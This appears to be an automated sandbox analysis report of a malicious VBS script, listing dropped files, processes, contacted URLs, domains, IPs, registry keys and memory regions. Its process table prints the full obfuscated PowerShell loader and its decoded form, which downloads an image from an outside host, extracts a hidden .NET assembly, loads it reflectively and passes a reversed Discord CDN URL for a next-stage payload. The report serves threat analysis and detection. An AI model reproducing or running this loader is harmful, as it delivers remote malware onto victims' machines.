Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
file.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ZKQQ9[1].txt
|
Unicode text, UTF-8 text, with very long lines (12211), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ity2f5r.lr1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3txpebpy.b3k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufopfn14.kny.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw0zxkih.x55.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreYgBlDgTreGUDgTreMDgTreBlDgTreDMDgTreZQDgTre2DgTreGQDgTreMQBhDgTreDMDgTreNDgTreDgTrezDgTreDgDgTreMDgTreDgTre2DgTreDIDgTreYwBlDgTreGEDgTreMgDgTreyDgTreDcDgTreNDgTreBjDgTreDEDgTreMDgTreDgTre2DgTreGIDgTreNQBjDgTreDgDgTreYQBmDgTreDcDgTreYwBhDgTreDQDgTreYgDgTre5DgTreDgDgTreODgTreBhDgTreDkDgTreOQBjDgTreGIDgTreZQDgTre4DgTreGUDgTreMwBjDgTreDcDgTreMwDgTre4DgTreDIDgTreNQBkDgTreGIDgTreODgTreDgTre5DgTreDgDgTreNgDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreOQBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreMQBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZQBsDgTreGkDgTreZgDgTrevDgTreDUDgTreODgTreDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDYDgTreMgDgTrewDgTreDUDgTreNwDgTreyDgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://paste.ee/d/ZKQQ9
|
188.114.96.3
|
|
|
|
https://paste.ee/
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
188.114.97.3
|
|
|
|
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://paste.ee/d/ZKQQ9U
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://paste.ee/;
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
http://uploaddeimagens.com.br
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://cdn.discordapp.com/attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb&
|
162.159.130.233
|
||
|
https://paste.ee/d/ZKQQ9ramF
|
unknown
|
||
|
https://pastcinzal.cinzalcinzal/d/ZKQQ9
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://paste.ee/d/ZKQQ9m
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://paste.ee/d/ZKQQ9e
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://paste.ee/d/ZKQQ9/m
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
uploaddeimagens.com.br
|
188.114.97.3
|
|
|
|
cdn.discordapp.com
|
162.159.130.233
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
uploaddeimagens.com.br
|
European Union
|
|
|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
162.159.130.233
|
cdn.discordapp.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1FA668CA000
|
heap
|
page read and write
|
||
|
7FFAAB673000
|
trusted library allocation
|
page execute and read and write
|
||
|
F4C7AFB000
|
stack
|
page read and write
|
||
|
1FA668D2000
|
heap
|
page read and write
|
||
|
1FA64ABE000
|
heap
|
page read and write
|
||
|
158E20B1000
|
trusted library allocation
|
page read and write
|
||
|
158FA151000
|
heap
|
page read and write
|
||
|
1FA66BA3000
|
heap
|
page read and write
|
||
|
5FFB47E000
|
stack
|
page read and write
|
||
|
158E2369000
|
trusted library allocation
|
page read and write
|
||
|
1FA66F10000
|
heap
|
page read and write
|
||
|
1B00489C000
|
trusted library allocation
|
page read and write
|
||
|
158FA066000
|
heap
|
page read and write
|
||
|
F4C7CFE000
|
stack
|
page read and write
|
||
|
1FA67416000
|
heap
|
page read and write
|
||
|
158E01C0000
|
trusted library allocation
|
page read and write
|
||
|
158DFF50000
|
heap
|
page read and write
|
||
|
5FFB1F8000
|
stack
|
page read and write
|
||
|
1B001C9B000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B74000
|
heap
|
page read and write
|
||
|
7FFAAB880000
|
trusted library allocation
|
page read and write
|
||
|
F4C7EFE000
|
stack
|
page read and write
|
||
|
158E2392000
|
trusted library allocation
|
page read and write
|
||
|
4C6183E000
|
stack
|
page read and write
|
||
|
F4C71D5000
|
stack
|
page read and write
|
||
|
5FFB27E000
|
stack
|
page read and write
|
||
|
1FA668D1000
|
heap
|
page read and write
|
||
|
1B0003EA000
|
trusted library allocation
|
page read and write
|
||
|
1FA668C6000
|
heap
|
page read and write
|
||
|
1FA67560000
|
heap
|
page read and write
|
||
|
1FA6755E000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
158E2353000
|
trusted library allocation
|
page read and write
|
||
|
1FA668D1000
|
heap
|
page read and write
|
||
|
5FFBF4D000
|
stack
|
page read and write
|
||
|
1B0064E5000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B69000
|
heap
|
page read and write
|
||
|
158F1F8F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB726000
|
trusted library allocation
|
page read and write
|
||
|
158FA0B2000
|
heap
|
page read and write
|
||
|
F4C7DFF000
|
stack
|
page read and write
|
||
|
5FFAA83000
|
stack
|
page read and write
|
||
|
1FA649C0000
|
heap
|
page read and write
|
||
|
1FA64A02000
|
heap
|
page read and write
|
||
|
158E001A000
|
heap
|
page read and write
|
||
|
1FA67360000
|
heap
|
page read and write
|
||
|
7FFAAB970000
|
trusted library allocation
|
page read and write
|
||
|
1FA6754B000
|
heap
|
page read and write
|
||
|
7FFAAB720000
|
trusted library allocation
|
page read and write
|
||
|
1FA67415000
|
heap
|
page read and write
|
||
|
4C611FE000
|
stack
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
1FA66C15000
|
heap
|
page read and write
|
||
|
158FA0ED000
|
heap
|
page read and write
|
||
|
1FA66BE1000
|
heap
|
page read and write
|
||
|
158FA160000
|
heap
|
page read and write
|
||
|
1FA66B69000
|
heap
|
page read and write
|
||
|
158E0006000
|
heap
|
page read and write
|
||
|
158E1A90000
|
heap
|
page read and write
|
||
|
1FA66B25000
|
heap
|
page read and write
|
||
|
1FA67389000
|
heap
|
page read and write
|
||
|
1FA67735000
|
heap
|
page read and write
|
||
|
7FFAAB852000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A1E000
|
heap
|
page read and write
|
||
|
1FA66BCA000
|
heap
|
page read and write
|
||
|
1FA67521000
|
heap
|
page read and write
|
||
|
7FFAAB910000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB72C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C6127C000
|
stack
|
page read and write
|
||
|
F4C77FE000
|
stack
|
page read and write
|
||
|
1FA67515000
|
heap
|
page read and write
|
||
|
158E209A000
|
trusted library allocation
|
page read and write
|
||
|
1FA64A50000
|
heap
|
page read and write
|
||
|
1FA67415000
|
heap
|
page read and write
|
||
|
1B0003F2000
|
trusted library allocation
|
page read and write
|
||
|
1B00185B000
|
trusted library allocation
|
page read and write
|
||
|
1FA66AF0000
|
remote allocation
|
page read and write
|
||
|
1B00269B000
|
trusted library allocation
|
page read and write
|
||
|
158E1AF8000
|
heap
|
page read and write
|
||
|
1FA66B8B000
|
heap
|
page read and write
|
||
|
158E2421000
|
trusted library allocation
|
page read and write
|
||
|
1FA668C1000
|
heap
|
page read and write
|
||
|
1FA66BFD000
|
heap
|
page read and write
|
||
|
1FA64A86000
|
heap
|
page read and write
|
||
|
1FA67364000
|
heap
|
page read and write
|
||
|
5FFB2FE000
|
stack
|
page read and write
|
||
|
1FA66B00000
|
heap
|
page read and write
|
||
|
1B010CF9000
|
trusted library allocation
|
page read and write
|
||
|
1FA66B73000
|
heap
|
page read and write
|
||
|
1FA649ED000
|
heap
|
page read and write
|
||
|
5FFAFFE000
|
stack
|
page read and write
|
||
|
1FA64990000
|
heap
|
page read and write
|
||
|
1FA668E0000
|
heap
|
page read and write
|
||
|
158FA155000
|
heap
|
page read and write
|
||
|
1FA649F2000
|
heap
|
page read and write
|
||
|
158FA180000
|
heap
|
page read and write
|
